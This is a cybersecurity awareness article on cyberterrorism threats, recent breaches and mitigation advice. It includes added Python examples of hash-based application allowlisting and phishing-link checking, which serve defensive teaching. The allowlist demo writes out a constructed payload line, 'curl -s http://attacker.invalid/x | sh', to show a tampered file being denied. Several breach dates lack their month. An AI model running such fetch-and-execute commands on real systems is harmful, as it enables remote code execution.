By Curtis KS Levinson CDP, CISSP-CAP, MBCP, CCSK
Director of Cyber Security Consulting
So, what does it take for the cyberworld to end? Cyber-attack, electric grid failure, EMP attack?
Exactly how dependent are we on technology and, especially, Internet-connected technology?
How long can we last if cut off from social media, shopping and email? No chat, no posting, no tweets.
What else do we use social media such as Facebook for? Logins for other sites, shopping and more. Can the world really be saved by hashtags instead of action?
We are a world at war: The paradigm of conventional warfare has passed and dissolved. Nations no longer confront each other on a field of battle or isolated theaters of conflict. The methods and tools of warfare have changed and yet the paradigm of the warfighter has not. War in cyberspace has victims, loss and triumph but seldom, if at all, victory or defeat. In cyberspace, real people can perish, nations and societies can suffer, but not one bullet is fired or a single multi-billion dollar weapons system is ever launched. In cyberspace, there are no negotiations, truce talks or cease fires. In cyberspace we fight invisible and often anonymous adversaries in a battle without either a clear goal or end.
In our multiverse of interconnections, cyber-attack has become a common factor in virtually every element of contemporary society, much as crime has been a part of human society since the dawn of time.
We, as a technological society, must accept that we are and will be attacked constantly through cyberspace. We must accept that at some level, cyber-attack is unavoidable.
Once we accept that we will be attacked, no matter what the countermeasures, and will potentially be totally or partially disabled, the process and concepts of continuity and recovery become increasingly critical.
Our cybersecurity paradigm must change: Our adversaries are already inside our networks and systems and, while it is important to maintain a strong perimeter defense, it is also extremely important that we protect the data, information and command/control inside our networks.
Our technology dependence leads to increased vulnerability.
The bad guys aren’t just at the door, they are already inside our networks, systems and technologies.
The need for persistent detection and defense in depth has never been more apparent. Anyone who has a computer needs to assume that it has already been compromised. Organizationally, it is imperative that our operating paradigm change to CIR (constant incident response) instead of RIR (reactive incident response). To accomplish this, security scrutiny needs to be placed at the point of attack, the data, rather than on maintaining a 21st-century Maginot line of IDS and IPS appliances at the perimeter.
Currently, existing infrastructure, technological limitations, regulatory overreach and operating costs impair innovation and impede rapid deployment of next-generation, real-time discovery and protection capabilities. Executive and board cyber decision-making is based on staid methodologies that account neither for the scope, speed and severity of these escalating threats nor for the resolve of our rapidly multiplying adversaries. Technological innovation must reduce dependence on human resources, enable machine-to-machine discovery, and deliver rapid, effective response by continuously monitoring known assets while constantly discovering unknown ones.
These capabilities need to mesh with the regulatory and audit demands without detracting from the CSO’s job of protecting organizational assets. Operational efficiency, in combination with technological innovation, can be accomplished within existing budgets.
Here are five ways cyberterrorists can and do target the United States:
- Denial of service (DoS);
- Cybercrime and business extortion;
- Cell phone targeting (Android and iOS botnets);
- Wiping bank records; and
- Targeting critical infrastructure (both government and industry).
Examples of some recent cyber-attacks include:
- February 2014: Las Vegas Sands, website hacked, compromising customer and corporate data; the website was down for almost a week.
- 19, 2013: Target Stores, credit and debit card information hacked, affecting 40 million customers.
- 10, 2014: Neiman Marcus, credit and debit card information hacked, affecting 1.1 million customers.
- May 21, 2014: eBay, loss of encrypted passwords, affecting 145 million users.
- June 24, 2014: Montana Health Department, personal data (PII/PHI) compromised, affecting 1.3 million people.
- 4, 2014: P.F. Chang’s restaurants, credit and debit card information hacked, with 33 locations compromised.
- 18, 2014: Community Health Systems, personal information (PII/PHI) including Social Security numbers compromised, affecting 4.5 million patients.
- 18, 2014: Home Depot, credit and debit card information hacked, affecting 56 million payment cards.
- 2, 2014: JPMorgan Chase, personal information compromised, affecting 83 million households and businesses.
- October 2014: Snapchat, 200,000 user images leaked, including those of children.
- October 2014: One of the nation’s largest bond insurers, loss of individual and government information, with the volume not yet determined.
- 28, 2014: The White House, Executive Office of the President, several unclassified networks penetrated, with the damage as yet unknown.
My colleague Alan Tilles, a partner of the law firm Shulman Rogers and a presenter at the 2014 Gaming Technology Forum, provided the following quote from USA Today:
Federal officials warned companies Monday that hackers have stolen more than 500 million financial records over the past 12 months, essentially breaking into banks without ever entering a building. “We’re in a day when a person can commit about 15,000 bank robberies sitting in their basement,” said Robert Anderson, executive assistant director of the FBI’s Criminal Cyber Response and Services Branch. The U.S. financial sector is one of the most targeted in the world, FBI and Secret Service officials told business leaders at a cybersecurity event organized by the Financial Services Roundtable. The event came in the wake of mass hacking attacks against Target, Home Depot, JPMorgan Chase and other financial institutions.
Gaming, both in physical locations and online venues, is subject to the same level of cyber-attacks as everyone else, perhaps even more so since so many of the financial transactions and games within a casino are based on moving money and financial instruments around the enterprise.
Online gaming is subject to attack not only because credit/debit card and affinity card (players’ card) data is held within the gaming system, but also because the transaction volume is extremely high as games are won and lost.
To end on a positive note, here are four cyber mitigation strategies from the Australian Signals Directorate (Australia’s counterpart to the NSA) that will greatly reduce the potential for a successful cyber-attack at the organizational level:
- Application White Listing: Everything is prohibited except that which is specifically
- Patching ALL systems and networks: They must be absolutely current/up to date.
- Restricting administrative privilege: Grant it only to the people and accounts that need it, and perform extended background investigations on the personnel who hold it.
- Defense in depth: Implement different security layers, including VPNs, VLANs and application-level firewalls, to ensure there is no single point of failure and no single direct path into the system.
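The first of these strategies, application whitelisting, is a default-deny rule: a program runs only if it is on the approved list, and anything else is blocked. The following is an added example written for this article (it is not code from the author or from the Australian Signals Directorate) showing the core of such a control keyed on file content rather than file name. The approved script, its allowlist entry and the tampered copy are all constructed in a temporary directory.

```python
"""Default-deny application allowlisting keyed on file content (SHA-256).

Added example for this article; it is not code from the author or from the
Australian Signals Directorate. The approved program, its allowlist entry and
the tampered copy are all constructed here in a temporary directory.
"""
import hashlib
import os
import tempfile
from typing import Dict, Tuple

# Constructed allowlist: SHA-256 hex digest -> approved program name.
# Everything absent from this dictionary is denied by default.
ALLOWLIST: Dict[str, str] = {}


def sha256_file(path: str) -> str:
    """Hash a file in 64 KiB chunks so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def approve(path: str, name: str, allowlist: Dict[str, str] = ALLOWLIST) -> str:
    """Record a known-good binary. Returns the digest that was added."""
    digest = sha256_file(path)
    allowlist[digest] = name
    return digest


def check_execution(path: str, allowlist: Dict[str, str] = ALLOWLIST) -> Tuple[bool, str]:
    """Default deny: permit only if the file's current hash is on the list."""
    try:
        digest = sha256_file(path)
    except OSError as exc:
        return False, f"deny {path}: cannot read file ({exc})"
    name = allowlist.get(digest)
    if name is None:
        return False, f"deny {path}: sha256 {digest[:12]}... not on allowlist"
    return True, f"allow {path}: matches approved program '{name}'"


def demo() -> Dict[str, bool]:
    """Approve one script, then test a renamed copy, a tampered copy and a missing file."""
    verdicts: Dict[str, bool] = {}
    with tempfile.TemporaryDirectory() as tmp:
        good = os.path.join(tmp, "backup.sh")
        original = b"#!/bin/sh\ntar czf /srv/backup.tgz /srv/data\n"  # constructed content
        with open(good, "wb") as fh:
            fh.write(original)
        approve(good, "backup.sh")

        # Same bytes under a new name: the content hash is unchanged, so still allowed.
        renamed = os.path.join(tmp, "totally_unrelated_name")
        with open(renamed, "wb") as fh:
            fh.write(original)

        # One appended line (constructed attacker payload) changes the hash: denied.
        tampered = os.path.join(tmp, "backup.sh.tampered")
        with open(tampered, "wb") as fh:
            fh.write(original + b"curl -s http://attacker.invalid/x | sh\n")

        verdicts["approved"] = check_execution(good)[0]
        verdicts["renamed"] = check_execution(renamed)[0]
        verdicts["tampered"] = check_execution(tampered)[0]
        verdicts["unknown"] = check_execution(os.path.join(tmp, "nothere"))[0]
    return verdicts


if __name__ == "__main__":
    for case, allowed in demo().items():
        print(f"{case:9s} -> {'allow' if allowed else 'deny'}")
```

Two points follow from the verdicts. A hash rule survives renaming but not a single modified byte, which is why it is stronger than a path rule (an approved directory would happily run whatever is dropped into it). The same property means every legitimate patch changes the hash and requires re-approval, so whitelisting and the patching strategy above have to be run as one process; products such as Windows AppLocker or fapolicyd on Linux automate exactly this bookkeeping.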
To wrap up, here are 21 simple personal mitigation strategies that, if implemented correctly, will greatly reduce the potential for cyber-attack at home:
- Make sure you install anti-virus, anti-spyware, malware and adware detection software from a reputable vendor onto your computer and keep it up to date. This will protect your computer from known viruses, malware and adware.
- Make sure your banking site’s address (URL) starts with https://, not http://. The “s” means the connection is encrypted and authenticated with TLS (formerly SSL), so the traffic cannot be read or altered in transit. It does not by itself prove that the site belongs to your bank, so check the domain name as well.
- Never use a link to reach your financial institution’s website. Emails and search engine links should not be trusted. Type in your bank’s website address into the Internet browser’s address bar every time.
- Know what your financial institution’s website looks like and what questions are asked to verify your identity. Some attacks, usually carried out by banking malware running on your own computer (a man-in-the-browser attack) or by an attacker relaying your connection (a man-in-the-middle attack), alter the login page. These changes let the attacker see your answers and add extra security questions. When you log in, the information is transmitted both to the attacker and to your financial institution, logging you into your bank’s website while also handing the attacker all of your account information. A vigilant user can sometimes spot these attacks by noticing slight modifications to the bank’s standard page: extra security questions, poor grammar, misspellings, a fuzzy or outdated bank logo, or a change in the location of each feature.
- Be extremely suspicious of emails purporting to be from your financial institution or a governmental agency. Financial institutions should never contact you via email to request you to verify information. If you believe the contact may be legitimate, do not use the link provided in the email, instead type the link to your financial institution in the Internet browser’s address bar or contact your financial institution at a phone number you know is valid.
- If you use a credit card to shop online, use only one credit card with a low limit. Choose a credit card with an online purchase protection plan if possible and monitor the activity on the card as often as possible.
- Avoid using check or debit cards for online transactions.
- Always lock or shut off your computer when you leave it unattended. Set your computer to lock automatically after a set period of inactivity (e.g., 15 minutes).
- Do not allow your computer to save your login names and passwords.
- Use a strong password of at least 10 characters combining upper-case and lower-case letters, numbers and symbols; longer is better.
- Never access your financial institution’s website from a public computer at a hotel, library or public wireless access point.
- Properly log out of all financial institution websites and close the browser window. Simply closing the active window may not be enough.
- When you are finished with your computer, turn it off or disconnect it from the Internet by unplugging the modem or Ethernet/DSL cable.
- Do not open emails from untrusted sources or suspicious emails from trusted sources.
- Do not visit untrusted websites or follow links provided by untrusted sources.
- Do not use the same computer for financial transactions that children or “non-savvy” Internet users use for regular Internet access.
- Do not use the login or password for your financial institution on any other website or software. Do not write it down, and do change it frequently.
- Do not post your personal information on the Web. Your high school, maiden name, date of birth, first car, first school, youngest sibling’s name, mother’s full name, father’s full name, best friend’s name, etc. are the answers to many security questions on financial websites. When you post this information, you are making it easier for criminals to gain access to your financial information.
- Check with your financial institution about enabling “alerts” and other security measures that may be available.
- If possible, set up accounts that are not accessed through the Internet and use those for long-term savings. Move money between those accounts and active accounts via the phone or in-person visits.
- Immediately report any suspicious activity in your accounts. There is a limited recovery window, and a rapid response may prevent additional losses.
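Several of the items above (check for https, never follow a link to your bank, be suspicious of e-mails carrying bank links) come down to one question: does this link really go where it appears to? The following is an added example written for this article, not the author’s code, showing how a link is actually taken apart and why eyeballing it is not enough. bank.example is a constructed domain standing in for a real institution, and every URL in sample_links() is constructed to show a different way a phishing link can mislead.

```python
"""Deciding whether a link really leads to your bank before following it.

Added example for this article, not the author's code. bank.example is a
constructed domain standing in for a real institution, and every URL in
sample_links() is constructed to show a different way a link can mislead.
"""
from typing import List, Tuple
from urllib.parse import urlsplit

BANK_DOMAIN = "bank.example"  # constructed; the name you would type yourself


def is_trusted_bank_link(url: str, bank_domain: str = BANK_DOMAIN) -> Tuple[bool, str]:
    """Return (trusted, reason). The default is distrust; every check must pass."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() != "https":
        return False, "not https: traffic could be read or altered in transit"
    if parts.username is not None:
        # https://bank.example@evil.example/ shows the bank's name, but the
        # browser connects to whatever follows the '@'.
        return False, "text before '@' is a username, not the site"
    host = parts.hostname  # lowercased, with port and userinfo removed
    if not host:
        return False, "no host in URL"
    try:
        # Unicode lookalike letters (e.g. Cyrillic 'а') become xn-- labels.
        host = host.rstrip(".").encode("idna").decode("ascii")
    except UnicodeError:
        return False, "host name is not a valid domain"
    if any(label.startswith("xn--") for label in host.split(".")):
        return False, "internationalised host; possible lookalike domain"
    if host == bank_domain or host.endswith("." + bank_domain):
        return True, f"{host} is {bank_domain} or one of its subdomains"
    return False, f"{host} is not {bank_domain} (prefix and suffix tricks do not count)"


def sample_links() -> List[str]:
    """Constructed links of the kind found in phishing e-mails."""
    return [
        "https://www.bank.example/login",                # genuine
        "https://www.bank.example:443/login",            # genuine, explicit port
        "http://www.bank.example/login",                 # downgraded to http
        "https://bank.example.verify-account.invalid/",  # bank name as a prefix
        "https://bank.example@evil.invalid/login",       # bank name before '@'
        "https://www.b\u0430nk.example/login",           # Cyrillic 'а' lookalike
        "https://secure-bank-example.invalid/login",     # bank name inside another word
    ]


def triage(urls: List[str]) -> List[Tuple[str, bool, str]]:
    """Apply the check to each link and keep the reason alongside the verdict."""
    return [(u,) + is_trusted_bank_link(u) for u in urls]


if __name__ == "__main__":
    for url, ok, why in triage(sample_links()):
        print(f"{'TRUST ' if ok else 'REJECT'} {url}\n        {why}")
```

Only the first two links pass; the other five each look like the bank to a casual reader and each fail for a different reason. That is the practical argument behind the rule above: the browser decides where to connect from the parsed host, not from the text that happens to appear in the link, so typing the address yourself removes the whole class of tricks at once.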
Five Ways Cyberterrorists Could Target the U.S.
Will the next terrorist attack occur in cyberspace?
As the Western world becomes increasingly concerned about ISIS and the potential for homegrown terrorist attacks by its adherents, governments and their publics have focused their concerns more on traditional physical attacks, while overlooking the potential for cyber-based assaults.
Cyberwarfare is now largely seen as an integral part of modern warfare by most developed nations, and countries like the US, Russia and China spend hundreds of millions of dollars per year developing these capabilities. Until now, however, we have yet to see sophisticated cyber tactics used by jihadist groups like al-Qaeda or ISIS.
But that could soon change.
For several years, jihadist militants have boasted in online forums that it is only a matter of time before they execute a highly disruptive attack on the US infrastructure or its financial systems. In spite of what certain skeptics might say, such attacks are feasible, for several reasons. First, it has been documented by countless security researchers that industrial control systems — these are the specialized computer systems used to run machinery at nuclear power plants, oil refineries, pipelines, electric grids, water treatment plants, etc. — are weak, outdated and vulnerable to attack. A report released this summer by the Center for the Study of the Presidency and Congress found that the electric grid is vulnerable to cyber attacks that could shut off power to critical public utilities and important sectors of the economy. Already, a number of cyber-espionage campaigns have successfully infiltrated these supervisory control and data acquisition (SCADA) systems, from the Russian-sponsored “Energetic Bear” to Telvent’s breach that was reportedly traced to Chinese hackers. A considerable amount of private sector research has gone into SCADA vulnerabilities with some of this knowledge becoming publicly available to security researchers and criminal groups alike. With an estimated net worth of $2 billion, ISIS has the financial means necessary to develop sophisticated, customized cyber attacks.
One of the greatest mistakes we can make is to underestimate this threat. After all, it’s not as if successful cyber attacks haven’t already been carried out in the name of terrorism:
- In 2011, the FBI and Philippine law enforcement officials arrested four individuals who were allegedly paid by terrorists to hack into AT&T’s Philippine networks.
- In 2012, a hacker group known as RedHack was prosecuted for taking down the central Turkish police website while simultaneously attacking 350 additional police websites across the country.
- In 2013, the Syrian Electronic Army launched a denial-of-service attack against the Washington Post and the New York Times, and just this year Lizard Squad tweeted out a bomb threat and carried out an attack against Sony’s PlayStation Network.
- In 2014, other groups such as AnonGhost carried out cyber operations against Israeli websites and Jewish businesses.
With this in mind, there are at least five different tactics terrorist hackers could use to target the US:
- Denial of service (DoS): This is one of the easiest types of attacks to attempt and does not take much technical ability. But for those who would say this is just an annoyance, not a real threat, consider this: DoS attacks on retailers during the holiday shopping season could affect holiday sales figures and corporate earnings of everyone from Best Buy to Apple, leading to potential stock price declines. DoS attacks on public utilities, such as energy and water treatment plants, could disrupt services and cause public panic. DoS attacks on state and federal election authorities and voting equipment could disrupt the electoral process and cast election results in doubt. And those are just a few examples. DoS has been used successfully by Middle Eastern hacktivist groups like the al-Qassam Cyber Fighters and the Syrian Electronic Army. Other groups like Anonymous, LulzSec and Lizard Squad have used DoS to disrupt the websites of major US banks, Western government agencies and major corporations. There are a variety of tools readily available on hacker sites designed to launch such attacks.
- Cyber-crime and business extortion: Right now the majority of organized cyber-crime is run by Russian and Eastern European groups with no real political agenda, just a desire to make money. But what if jihadist groups played a more active role in this? For one, they could raise a great deal of money to finance their terrorist operations, to the tune of millions of dollars per year, just by selling “crimeware” kits, renting “botnets” and extorting businesses with DoS attacks or “ransomware” (one type of ransomware, called CryptoLocker, is estimated to have earned $30 million for criminals). And let’s take this last point even further. Suppose cyber extortion became a more widely used tactic by jihadists, not just to raise money for themselves, but to disrupt the US economy, achieve political goals or limit freedom of speech?
- Cell phone targeting: For less than $25,000 anyone can track cell phone users around the globe using surveillance products like SkyLock, which exploit the SS7 signaling protocol that carriers use to route calls and exchange roaming information; cell-site simulators such as the StingRay intercept and locate phones within radio range of the device. Cell phone tracking products can be used by terrorists to target high-profile individuals for assassination or kidnapping. Given the ease with which hackers have compromised celebrities’ cell phones in the past, it’s not too far-fetched to imagine a more dire potential here.
- Wiping bank records: In 2012, Mideast hackers infected 30,000 computers at Saudi Aramco with the Shamoon virus. What made this attack particularly frightening is that the virus carried an additional type of malware inside it, known as a “wiper,” which destroyed all the data on the computers’ hard disks and rendered them unbootable, making them unusable. What if this attack had instead been used against Bank of America, JPMorgan Chase or Wells Fargo to destroy account records? Or how about the IRS? Imagine the chaos such an attack would cause for the US financial system. Wipers are a type of malware focused solely on destroying computers and sabotaging operations. As such, they are poorly suited to cyber-criminals or cyber-espionage, whose operators need the victim’s systems to keep working. They do, however, make the perfect weapon for a hacktivist group or cyberwarfare operation, which jihadist groups could adopt. Wiper attacks used to be rare, but they are becoming more common. In addition to Saudi Aramco, these attacks have targeted South Korea and Mideast countries like Iran. A number of wiper strains have been discovered, including Flamer, Disttrack and Narilam.
- Targeting critical infrastructure: Even more frightening to consider is the potential for terrorists to attack critical facilities in the US by exploiting well-known (but so far largely unfixed) vulnerabilities. Industrial control systems like SCADA control the mechanical processes at power plants, electric grids, water treatment plants, oil refineries and so on, basically any large-scale industrial operation. However, these systems were designed decades ago, before security was a real concern. Because some of them are now connected to the Internet, they can be remotely accessed and are easily penetrated. Stuxnet is an example of a SCADA attack and was used successfully to disrupt Iranian nuclear enrichment facilities. It would not be hard for a well-funded group, such as ISIS, to pull off this type of attack; in fact, industrial control systems are often easier to penetrate than traditional corporate computer networks. There’s even a search engine that specializes in finding unprotected access points on critical infrastructure systems, and hacking tools are available for criminals to purchase. This type of attack could be used to cause a regional power outage, disable a water treatment plant, or disrupt an oil refinery, pipeline or fracking operation, all of which could be done in such a way as to disrupt a major city, endanger public safety for millions of people, cause a public health crisis and widespread panic, and even cause fatalities.
Cyberterrorist attacks on U.S. firms and infrastructure pose a serious threat to America’s national security and economic health. In the end, this is not a threat that we can afford to underestimate.